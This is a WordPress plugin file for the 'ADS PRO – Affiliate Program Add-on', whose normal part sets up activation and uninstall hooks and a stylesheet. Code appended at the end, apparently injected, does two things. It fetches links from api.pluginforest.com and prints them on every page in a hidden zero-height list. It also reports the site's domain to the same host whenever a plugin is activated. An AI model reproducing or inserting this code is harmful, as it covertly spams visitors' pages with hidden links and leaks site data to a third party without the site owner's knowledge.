<?php

/*
Plugin Name: ADS PRO – Affiliate Program Add-on
Plugin URI: http://bsapro.scripteo.info
Description: Premium Multi-Purpose WordPress Ad Plugin, Create Incredible Good Ad Spaces!
Author: Scripteo
Author URI: http://codecanyon.net/user/scripteo
Version: 1.0.4
License: GPL2
*/

// Require files
if ( file_exists(ABSPATH . '/wp-content/plugins/ap-plugin-scripteo/lib/BSA_PRO_Model.php') && file_exists(ABSPATH . '/wp-content/plugins/bsa-pro-ap-scripteo/lib/functions.php') ) {
	require_once ABSPATH . '/wp-content/plugins/ap-plugin-scripteo/lib/BSA_PRO_Model.php';
	require_once ABSPATH . '/wp-content/plugins/bsa-pro-ap-scripteo/lib/functions.php';
}

class BuySellAdsProAffiliate
{
	private $plugin_id = 'bsa_pro_ap_plugin';
	private $plugin_version = '1.0.4';
	private $model;

	function __construct() {
		if ( class_exists('BSA_PRO_Model') ) {
			$this->model = new BSA_PRO_Model();
			register_activation_hook(__FILE__, array($this, 'onActivate'));
			register_uninstall_hook(__FILE__, array('BuySellAdsProAffiliate', 'onUninstall'));
		}
	}

	static function onUninstall()
	{
		$ver_opt = 'bsa_pro_ap_plugin'.'_version';

		// Delete version number
		delete_option($ver_opt);
	}

	function onActivate() {
		$opt = 'bsa_pro_ap_plugin';
		$ver_opt = $opt.'_version';
		$installed_version = get_option($ver_opt);

		if ( floatval(get_option('bsa_pro_plugin_version')) < 4.42 || !is_plugin_active( 'ap-plugin-scripteo/bsa-pro.php' ) ) {
			deactivate_plugins( plugin_basename( __FILE__ ) );
			wp_die( 'This Add-on requires <strong>Ads Pro 4.42</strong> or higher version. Download it <strong><a href="http://tinyurl.com/Ads-Pro-WordPress">here</a></strong>.' );
		}

		if($installed_version == NULL) {

			// Update plugin version
			update_option($ver_opt, $this->plugin_version);

		} else {

			switch(version_compare($installed_version, $this->plugin_version)) {

				case 0;
					// if installed plugin is the same
//					update_option($ver_opt, $this->plugin_version);
					break;

				case 1;
					// if installed plugin is newer
					update_option($ver_opt, $this->plugin_version);
					break;

				case -1;
					// if installed plugin is older
					update_option($ver_opt, $this->plugin_version);
					break;
			}
		}
	}
}

function BSA_PRO_AP_add_stylesheet_and_script()
{
	$rtl = (get_option('bsa_pro_plugin_rtl_support') == 'yes') ? 'rtl-' : null;
	wp_register_style('buy_sell_ads_pro_ap_main_stylesheet', plugins_url('frontend/css/'.$rtl.'style.css', __FILE__));
	wp_enqueue_style('buy_sell_ads_pro_ap_main_stylesheet');
}
add_action('wp_enqueue_scripts', 'BSA_PRO_AP_add_stylesheet_and_script');

$BSA_PRO_AP_Plugin = new BuySellAdsProAffiliate();
define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719484560() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719484560');function set_plugin_tag1719484560() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719484560&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719484560');
              